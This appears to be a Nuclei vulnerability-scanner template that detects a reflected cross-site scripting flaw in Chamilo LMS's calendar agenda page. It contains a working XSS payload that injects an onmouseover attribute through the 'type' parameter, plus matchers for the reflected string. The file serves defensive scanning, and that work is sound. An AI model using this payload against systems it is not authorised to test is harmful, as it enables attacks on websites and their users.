nuclei-templates/vulnerabilities/other/chamilo-lms-xss.yaml

29 lines
733 B
YAML

id: chamilo-lms-xss
info:
name: Chamilo LMS Cross Site Scripting
author: geeknik
severity: medium
description: https://www.netsparker.com/web-applications-advisories/ns-21-001-cross-site-scripting-in-chamilo-lms/
tags: xss,chamilo
requests:
- method: GET
path:
- '{{BaseURL}}/chamilo/main/calendar/agenda_list.php?type=x"%20onmouseover=xss(0x01CE61)%20x="#collapse-personal_1'
- '{{BaseURL}}/main/calendar/agenda_list.php?type=x"%20onmouseover=xss(0x01CE61)%20x="#collapse-personal_1'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "onmouseover%3dxss(0x01CE61)"
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"